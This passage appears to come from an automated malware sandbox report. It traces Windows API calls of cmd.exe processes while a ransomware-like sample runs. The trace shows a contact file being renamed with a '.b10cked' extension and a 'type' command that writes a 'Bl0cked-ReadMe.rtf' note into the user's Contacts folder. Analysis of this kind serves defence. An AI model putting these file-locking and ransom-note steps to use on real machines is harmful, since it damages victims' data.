_MaxCount=0x7) returned -3 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned 
-18 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0217.987] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0217.988] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0217.988] _wcsicmp (_String1="ADMINI~1.CON", _String2=".") returned 51 [0217.988] _wcsicmp (_String1="ADMINI~1.CON", _String2="..") returned 51 [0217.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\admini~1.con")) returned 0x20 [0217.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xc1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.988] SetErrorMode (uMode=0x0) returned 0x0 [0217.988] SetErrorMode (uMode=0x1) returned 0x0 [0217.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", nBufferLength=0x104, lpBuffer=0x30e9fc, lpFilePart=0x30e9e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", lpFilePart=0x30e9e4*="ADMINI~1.CON") returned 0x26 [0217.988] SetErrorMode (uMode=0x0) returned 0x1 [0217.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x11 [0217.988] _wcsicmp (_String1="ADMINI~1.CON", _String2=".") returned 51 [0217.988] _wcsicmp (_String1="ADMINI~1.CON", _String2="..") returned 51 [0217.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\admini~1.con")) returned 0x20 [0217.989] SetErrorMode (uMode=0x0) returned 0x0 [0217.989] SetErrorMode (uMode=0x1) returned 0x0 [0217.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", nBufferLength=0x104, lpBuffer=0x30ee78, lpFilePart=0x30ec10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", lpFilePart=0x30ec10*="ADMINI~1.CON") returned 
0x26 [0217.989] SetErrorMode (uMode=0x0) returned 0x1 [0217.989] SetErrorMode (uMode=0x0) returned 0x0 [0217.989] SetErrorMode (uMode=0x1) returned 0x0 [0217.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked", nBufferLength=0x104, lpBuffer=0x30f080, lpFilePart=0x30ec10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked", lpFilePart=0x30ec10*="Administrator.contact.b10cked") returned 0x37 [0217.989] SetErrorMode (uMode=0x0) returned 0x1 [0217.989] SetLastError (dwErrCode=0x0) [0217.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact.b10cked")) returned 0xffffffff [0217.989] GetLastError () returned 0x2 [0217.989] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", fInfoLevelId=0x1, lpFindFileData=0x30e58c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e58c) returned 0xb0e58 [0217.989] FindNextFileW (in: hFindFile=0xb0e58, lpFindFileData=0x30e58c | out: lpFindFileData=0x30e58c) returned 0 [0217.990] GetLastError () returned 0x12 [0217.990] FindClose (in: hFindFile=0xb0e58 | out: hFindFile=0xb0e58) returned 1 [0217.991] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON", fInfoLevelId=0x1, lpFindFileData=0xc1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc1bd8) returned 0xb0e58 [0217.991] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked", nBufferLength=0x104, lpBuffer=0x30e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked", lpFilePart=0x0) returned 0x37 [0217.991] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", nBufferLength=0x104, lpBuffer=0x30e824, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x2f [0217.991] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact")) returned 0x20 [0217.991] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact.b10cked"), dwFlags=0x3) returned 1 [0217.991] FindClose (in: hFindFile=0xb0e58 | out: hFindFile=0xb0e58) returned 1 [0217.992] _vsnwprintf (in: _Buffer=0x49ff5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30e7d8 | out: _Buffer=" 1") returned 9 [0217.992] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.992] GetFileType (hFile=0x7) returned 0x2 [0218.017] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0218.017] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30e764 | out: lpMode=0x30e764) returned 1 [0218.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.017] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30e798 | out: lpConsoleScreenBufferInfo=0x30e798) returned 1 [0218.017] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a004640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0218.018] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a004640, nSize=0x2000, Arguments=0x30e7d8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0218.018] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a004640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30e7bc, lpReserved=0x0 | out: lpBuffer=0x4a004640*, lpNumberOfCharsWritten=0x30e7bc*=0x1a) returned 1 [0218.018] _get_osfhandle (_FileHandle=1) returned 0x7 
[0218.018] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.018] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.018] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0218.018] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.018] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0218.018] SetConsoleInputExeNameW () returned 0x1 [0218.018] GetConsoleOutputCP () returned 0x1b5 [0218.019] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.019] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.019] exit (_Code=0) Process: id = "560" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16cc0" os_pid = "0x8c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32499 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32500 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32501 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" 
filename = "" Region: id = 32502 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 32503 start_va = 0x49fd0000 end_va = 0x4a01bfff entry_point = 0x49fd0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32504 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32505 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32506 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32507 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32508 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32592 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32593 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32594 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32595 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 
32596 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 32597 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32598 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32599 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32600 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32601 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32602 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32603 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32604 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32605 start_va = 0x7f6f0000 
end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32606 start_va = 0x4a0000 end_va = 0x567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 32607 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32608 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32609 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32610 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 32611 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32612 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32613 start_va = 0x570000 end_va = 0x670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 32614 start_va = 0x680000 end_va = 0x127ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 32615 start_va = 0x1280000 end_va = 0x13e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Thread: id = 764 os_tid = 0xc04 [0218.053] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f83c | out: lpSystemTimeAsFileTime=0x24f83c*(dwLowDateTime=0xb6c61300, dwHighDateTime=0x1d440a9)) [0218.053] 
GetCurrentProcessId () returned 0x8c8 [0218.053] GetCurrentThreadId () returned 0xc04 [0218.053] GetTickCount () returned 0x3cf11 [0218.053] QueryPerformanceCounter (in: lpPerformanceCount=0x24f834 | out: lpPerformanceCount=0x24f834*=27484251708) returned 1 [0218.054] GetModuleHandleA (lpModuleName=0x0) returned 0x49fd0000 [0218.054] __set_app_type (_Type=0x1) [0218.054] __p__fmode () returned 0x76b331f4 [0218.054] __p__commode () returned 0x76b331fc [0218.054] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ff21a6) returned 0x0 [0218.054] __getmainargs (in: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c, _DoWildCard=0, _StartInfo=0x49ff4140 | out: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c) returned 0 [0218.054] GetCurrentThreadId () returned 0xc04 [0218.054] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc04) returned 0x38 [0218.054] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0218.054] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0218.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.055] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.055] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f7cc | out: phkResult=0x24f7cc*=0x0) returned 0x2 [0218.055] VirtualQuery (in: lpAddress=0x24f803, lpBuffer=0x24f79c, dwLength=0x1c | out: lpBuffer=0x24f79c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.055] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f79c, dwLength=0x1c | out: lpBuffer=0x24f79c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0218.055] VirtualQuery (in: 
lpAddress=0x151000, lpBuffer=0x24f79c, dwLength=0x1c | out: lpBuffer=0x24f79c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0218.055] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f79c, dwLength=0x1c | out: lpBuffer=0x24f79c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.055] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f79c, dwLength=0x1c | out: lpBuffer=0x24f79c*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0218.055] GetConsoleOutputCP () returned 0x1b5 [0218.055] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.055] SetConsoleCtrlHandler (HandlerRoutine=0x49fee72a, Add=1) returned 1 [0218.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.055] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0218.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.055] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0218.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.056] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.056] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.056] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0218.056] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.056] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0218.056] GetEnvironmentStringsW () returned 0x3b0168* [0218.056] FreeEnvironmentStringsW (penv=0x3b0168) returned 1 [0218.056] GetEnvironmentStringsW () returned 0x3b0168* [0218.056] FreeEnvironmentStringsW (penv=0x3b0168) returned 1 [0218.056] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", 
ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e73c | out: phkResult=0x24e73c*=0x40) returned 0x0 [0218.056] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x90, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x1, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x1, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x0, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x40, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x40, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x40, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegCloseKey (hKey=0x40) returned 0x0 [0218.057] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e73c | out: 
phkResult=0x24e73c*=0x40) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x40, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x1, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x1, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x0, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x9, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x4, lpData=0x24e748*=0x9, lpcbData=0x24e740*=0x4) returned 0x0 [0218.057] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e744, lpData=0x24e748, lpcbData=0x24e740*=0x1000 | out: lpType=0x24e744*=0x0, lpData=0x24e748*=0x9, lpcbData=0x24e740*=0x1000) returned 0x2 [0218.057] RegCloseKey (hKey=0x40) returned 0x0 [0218.057] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b4 [0218.057] srand (_Seed=0x5b8863b4) [0218.057] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf\"" [0218.057] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf\"" [0218.057] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.058] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0218.058] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.058] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.058] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.058] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0218.058] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0218.058] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0218.058] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0218.058] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0218.058] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0218.058] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0218.058] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0218.058] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0218.058] GetEnvironmentStringsW () returned 0x3b22b8* [0218.058] FreeEnvironmentStringsW (penv=0x3b22b8) returned 1 [0218.058] GetEnvironmentVariableW 
